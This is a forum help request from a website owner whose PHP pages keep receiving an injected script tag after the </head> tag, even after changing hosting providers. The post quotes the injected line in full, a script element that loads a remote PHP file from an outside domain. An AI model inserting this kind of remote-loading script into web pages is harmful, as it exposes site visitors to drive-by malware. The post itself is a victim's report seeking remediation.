Malware coding adding runtime

In our website a malware code automatically adding runtime. Our website is http://www.aslogtech.com. Previously it was hosted with www.hostupon.com and the attack begin from that server. To remove it, we have changed the server and now it is hosted with www.bluehost.com

Right now in my php pages there is no malware code as well as my antivirus is fully updated. I am using Kaspersky 2010 and Malwarebytes Anti Malware and all are purchased and upto date.

Into the new server the malware code automatically adding after the </head> tag. The malware code is "<script src=http://emrahkeskin.com/images/biyografi.php ></script>"

Please let me know what I have to do here. I am very fraustrated as I have applied almost all the possible solution and still under problem. Right now I have uploaded a under constrcution page as due to the malware code Google does not giving permission to open the website.

I need help a lot.
